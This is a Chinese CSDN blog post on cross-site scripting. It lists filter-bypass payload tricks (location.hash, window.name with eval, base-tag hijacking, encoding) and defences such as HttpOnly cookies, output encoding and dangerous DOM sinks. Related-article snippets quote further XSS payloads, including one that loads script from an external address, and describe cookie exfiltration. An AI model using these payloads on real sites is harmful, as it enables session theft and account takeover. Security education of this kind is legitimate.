Xss多种姿势

最新推荐文章于 2023-06-15 12:00:00 发布
最新推荐文章于 2023-06-15 12:00:00 发布
阅读量710 收藏
点赞数
分类专栏: web sec
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19683651/article/details/79606418
版权

xss攻击

字符编码

firefox下某参数为%c1\"alert(/xss/)
var username="";alert(/xss/)

绕过长度限制

location.hash
http://www.test.com#alert()
onclick='eval(location.hash.substr(1))
注释
多个input把中间注释><!--   -->
base标签
<base href="https://www.baidu.com"/>
<base target="_blank" />
<img src='test/img.jpg'/>
window.name
window.name存储payload,eval实现执行
window.name="alert(1)"
eval(name);

flash xss和 js框架poc也是很有参考价值的。

xss防御

httpOnly

禁止js访问带有httpOnly属性的cookie

java ee
response.setHeader("Set-Cookie"),"cookiename=value;Path=/;Domain=domainvalue;Max-Age=seconds;HttpOnly");
c#
HttpCookie mycookie=new HttpCookie("myCookie");
mycookie.HttpOnly=true;
Response.AppendCookie(mycookie);
php5
setcookie("abc","test",NULL,NULL,NULL,NULL,TRUE);

需要注意的是Apache服务器header的TRACE

输入检查

特殊字符输入检查,xss filter

输出检查

编码或转义

编码

可以参考owasp中esapi的Html Encode,JavaScript Encode
python的web2py框架
encodeURI等

富文本

对于<a><img><div>等安全标签使用白名单,对于<iframe><script><base><form>等应当严格禁止。

防止dom based xss

需要注意这些函数

document.write()
document.writeln()
XXX.innerHTML=
XXX.outerHTML=
innerHTML.replace()
document.attachEvent()
windows.attachEvent()
document.location.replace()
document.location.assign()
......
浅浅徘徊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Web 安全】XSS的三种姿势及其防范手段
weixin_54787877的博客
03-15 2703
介绍 XSS 是跨站脚本攻击(Cross Site Scripting)的简写,但是从首写字母命名的方式来看,应该取名 CSS,但这样就和层叠样式(Cascading Style Sheets,CSS)重名了,所以取名为 XSSXSS 攻击,一般是指攻击者通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式。 分类 XSS 攻击按是否把攻击数据存进服务器端,攻击行为是否伴随着攻击数据一直存在,可分为非持久型XSS攻击和持久型XSS攻击。 XSS 攻...
XSS的一些简单姿势
weixin_45053353的博客
05-12 581
XSS的一些简单姿势通过javascript指令实现的图片无引号无分号不区分大小写的xss攻击向量默认SRC属性去绕过SRC域名检测过滤器通过error事件触发alert未完待续,一些自己的小心得,第一次发表,望大大们海涵。 通过javascript指令实现的图片 图片xss依靠javascript指令实现。(IE7.0不支持javascript指令在图片上下文中,但是可以在其他上下文触发。下面的...
xss 姿势
henwanyan的博客
02-22 851
1.http://www.backlion.org/?p=6218 2.https://www.leavesongs.com/PENETRATION/xss-collect.html 3.文件上传XSS:  http://www.55118885.com/w/529184.html 4.https://xianzhi.aliyun.com/forum/read/536.html 5.理解x
XSS(跨站脚本攻击)多姿势绕过滤思路
ElsonHY的博客
11-17 1240
XXS(跨站脚本攻击)多姿势绕过滤思路0x01 什么是XSS?0x02 XSS的危害0x03 XSS类型0x04 多姿势绕过1.基本的xss2.大小写绕过、字符拼接3.解锁更多姿势4.转义字符的排除0x05 其他情况0x06 总结 0x01 什么是XSS? 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击主要针对的是客户端的攻击。 0x02 XSS的危害 XSS能实现的的攻击有很多,一般攻击水平是取决
xss姿势利用
weixin_30635053的博客
05-16 305
1.定位页面可以出现xss的位置 可能会出现联合点利用 一个页面多个存储位置或者一个页面多个参数联合利用 例如输入xss 查看页面源码页面里有多个xss 或者多个参数显示 可以利用 需要注意的是有的是js动态加载标签或者iframe嵌套和框架嵌套 需要去审查元素 如果xss位置在js 可以直接利用js弱语言的特性直接写js 如果xss位置在html 标签属性中 可以先判断闭...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
springboot整合XSS
03-20
开发者应当充分理解XSS的原理和危害,遵循最佳实践,结合多种手段,构建安全的Web应用环境。通过配置Spring Security,使用过滤器,以及配合其他安全库,我们可以显著增强Spring Boot应用对XSS攻击的防御能力。
Xss Scan tool
05-25
Xss Scan工具是一款专为网络安全专业人士设计的插件,它集成在Burp Suite这款流行的网络安全测试平台上,主要用于检测和识别Web应用程序中的XSS(跨站脚本)漏洞。XSS攻击是网络安全领域的一个重要问题,它允许攻击...
java 预防XSS攻击
08-23
在Java开发过程中,XSS(Cross Site Scripting)攻击是一种常见的安全威胁,它允许攻击者在用户的浏览器上执行恶意脚本。XSS攻击通常发生在Web应用程序未能充分验证或过滤用户输入的情况下,使得恶意代码能够被嵌入...
xss_javaxss_XSS_
10-04
在网络安全领域,XSS(Cross-Site Scripting)攻击是一种常见的威胁,它允许攻击者通过在网页中注入恶意脚本,来劫持用户会话、窃取敏感信息或执行其他恶意操作。Java作为广泛使用的服务器端编程语言,也可能会遭遇...
xss-学习姿势
xyzBlog
08-11 399
xss也叫跨站脚本攻击,原因在于网站的前端因为对输入或者输出不严谨从而可以在网站插入脚本代码造成xss攻击。 <The rest of contents | 余下全文> xss形成分类 主要是分为反射型和存储型还有dom型 反射型 这里的提交参数没有进行过滤转义,导致输出处可直接执行脚本代码 <form action = "htmlzr." method = "get"> name:<input type = "text" name = "htmlname"> &l
xss跨站脚本攻击姿势大全
qq_56438857的博客
05-25 1006
xss攻击的四十种姿势
安全测试之XSS绕过姿势总结
最新发布
LYX_WIN
06-15 319
xss test
XSS绕过姿势汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
05-25 216
一、更换JS引入方式 正常情况下,执行js代码有三种方法: 1、行间式 <div onclick="alert('yea...这样子可以执行JS哦')"></div> <a href="javascript:alert('执行JS代码但不跳转');">点我</a> <a href="javascript:void(0)" onclick="alert('点击执行JS代码');">再来点我啊</a> 2、外链式 <script
XSS绕过姿势总结
nigo134的博客
07-16 1640
0x00 XSS基本测试流程 原则是“见框就插”,多动手,这里分享几个经典测试payload: "><svg/onload=alert(1)// 具体引用外部js的代码姿势是: <svg/onload=s=createElement('script');body.appendChild(s);s.src='js地址'// 在火狐浏览器下查看的效果(浏览器解析时会自动加上引号): <a href="javascript:alert(1)" >click me
浅谈XSS攻击的那些事(附常用绕过姿势
qq_42801460的博客
03-29 1409
有的时候,服务器往往会对代码中的关键字(如alert)进行过滤,这个时候我们可以尝试将关键字进行编码后再插入,不过直接显示编码是不能被浏览器执行的,我们可以用另一个语句eval()来实现。由于盗取的cookie需要传回给攻击者,因此往往需要一个服务器来接收盗取的cookie,这也就是xss平台的作用了。也就是攻击相对于访问者而言是一次性的,具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。
[网络安全]DVWA之XSS(Reflected)攻击姿势及解题详析合集
热门推荐
等风来
05-17 1万+
Payload:alert("qiu")由于str_replace() 函数将标签替换为空,且str_replace函数仅执行一次Payload将变为alert("qiu"),从而实现了正常XSS语句的注入在 PHP 中,变量名、函数名、常量名等标识符都是区分大小写的。 例如,$Qiu 和 $qiu 是两个不同的变量因此我们可构造Payload如下来绕过限制:Payload:alert("
【网络安全】XSS之Cookie外带攻击姿势及例题详析
等风来
05-19 7158
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
这是一篇另类的XSS绕过奇招
Adminxe的博客
05-03 419
1.过滤了<>尖括号: 原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。 autofocus οnfοcus=location=”javasCript:s=document.createElement(“script”);s.src=”http:///xx.js”; document.body.appen...
XSS漏洞利用深度解析
接着,资料提到了多种利用XSS的方式,包括使用AJAX(异步JavaScript和XML)技术的跨域请求。在同域请求中,如IE、Chrome等浏览器,可以通过`ActiveXObject`或`XMLHttpRequest`发送请求。而在跨域请求中,由于同源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值